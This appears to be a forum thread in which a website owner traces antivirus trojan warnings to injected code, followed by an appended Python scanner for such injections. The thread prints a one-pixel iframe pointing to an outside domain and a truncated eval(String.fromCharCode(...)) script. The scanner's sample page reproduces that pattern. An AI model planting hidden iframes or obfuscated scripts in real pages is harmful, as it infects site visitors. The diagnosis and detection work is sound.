oh_maestro
asked on
Help! My website is causing browsers to get HTML:IFrame-EE Trojan! and Mal/EncPk-F & Mal/HckPk-A also
I have a web site (I will give you the URL if someone says it is OK) in which I've had a couple browsers get this message from AVAST:
HTML:IFrame-EJ [trj]
Type: Trojan Horse
I also have once gotten the malware Mal/EncPk-F and Mal/HckPk-A (Sophos Anti-Virus) when visiting the site.
My hosting is through Go Daddy, and they insist there is no virus or trojan on their end.
Don't get me wrong - the website usually works without a problem; but we are getting ready to promote the website & I don't want any hint of malware coming to my site.
My site is on a UNIX server and I am using PHP & MySQL. I am using sessions on every page.
ASKER
Increasing Pts!
PHP4 is pretty old, you should upgrade if possible. There were several SQL injection attacks against that version of DW, make sure it's patched and updated: http://secunia.com/advisories/product/3194/?task=advisories
Find anything that is not yours on your server, and clean it out. Then chmod 644 every directory that does not need write access. Is this a GoDaddy server? They should provide more up-to-date instances of PHP.
http://www.UnmaskParasites.com/security-report/?page=openhousesohio.com
http://www.google.com/safebrowsing/diagnostic?site=openhousesohio.com
https://www.google.com/accounts/ServiceLoginAuth?service=sitemaps
http://www.directadmin.com/forum/showthread.php?p=157818
-rich
I think your login form needs sanitization; download the xss-me and sql-inject-me Firefox extensions. Go to your login page, right-click and select "open xss me sidebar" or the sql-inject me sidebar, and run all tests.
Read up on input validation/sanitization, xss and sql injection: http://shiflett.org/articles
I think he wrote and developed mysql_real_escape_string for php: http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
http://code.google.com/p/inspekt/
-rich
ASKER
The long Javascript code at the end was the culprit. Someone had hacked into my website and put that at the bottom of the page. I was able to get it removed from my site, and I have a whole new list of tougher passwords.
Thanks!
Glad to help, and beyond password choices, input validation is a must to avoid SQL injection. The site looks solid from an XSS point of view, but SQL injection on your login form could be worse.
Good luck!
-rich
That's good stuff! Thanks for the feedback :)
ASKER
Using Firebug, I found this:
<iframe height="3" width="1" src="http://foxionserl.com/">
and this
<script type="text/javascript">
eval(String.fromCharCode(1
I did not type any of this code.
I do not see this code when I go to View+Source in IE. I also do not see anything like this on my code.
My main editor is Macromedia Dreamweaver MX 2004, and I have to FTP files to my GoDaddy account. I am using PHP 4.
Has my site been hacked?
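Added example, not part of the original thread: a small Python check that flags the two markers described in the post above, an iframe sized to be invisible and a script hidden behind `eval(String.fromCharCode(...))`, and decodes the character codes for review without running them. The function names, the 5-pixel threshold, and the sample page (including `injected.example`) are assumptions constructed for illustration.

```python
import re

# Patterns for the two markers quoted in the post: a near-invisible iframe
# and script text hidden as decimal character codes.
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR_RE = re.compile(r"([\w-]+)\s*=\s*(?:\"([^\"]*)\"|'([^']*)'|([^\s>]+))")
CHARCODE_RE = re.compile(r"eval\s*\(\s*String\.fromCharCode\s*\(([\d\s,]+)\)", re.I)
HIDDEN_CSS_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
TINY_PX = 5  # assumption: an iframe this small in either dimension is meant to be unseen


def _attrs(tag_body):
    return {m.group(1).lower(): next(g for g in m.groups()[1:] if g is not None)
            for m in ATTR_RE.finditer(tag_body)}


def _is_tiny(value):
    m = re.fullmatch(r"\s*(\d+)\s*(?:px)?\s*", value or "", re.I)
    return bool(m) and int(m.group(1)) <= TINY_PX  # "100%" and the like are not flagged


def scan_markup(text):
    """Return sorted (line, kind, detail) findings for one file's contents."""
    findings = []
    for m in IFRAME_RE.finditer(text):
        a = _attrs(m.group(1))
        if (_is_tiny(a.get("width")) or _is_tiny(a.get("height"))
                or HIDDEN_CSS_RE.search(a.get("style", ""))):
            findings.append((text.count("\n", 0, m.start()) + 1, "hidden-iframe", a.get("src", "")))
    for m in CHARCODE_RE.finditer(text):
        codes = [int(c) for c in re.findall(r"\d+", m.group(1))]
        # Decode for human review only; the result is never executed.
        decoded = "".join(chr(c) for c in codes if c < 0x110000)
        findings.append((text.count("\n", 0, m.start()) + 1, "charcode-eval", decoded))
    return sorted(findings)


# Constructed sample: a clean page with extra markup appended after </html>.
SAMPLE = """<html><body>
<h1>Listings</h1>
<iframe width="560" height="315" src="https://video.example/embed"></iframe>
</body></html>
<iframe height="3" width="1" src="http://injected.example/">
<script type="text/javascript">
eval(String.fromCharCode(118,97,114,32,120,61,49,59))
</script>
"""
```

Run `scan_markup` over the contents of each `.php`, `.html` and `.js` file pulled down from the server, and compare any hit against the copy you last uploaded.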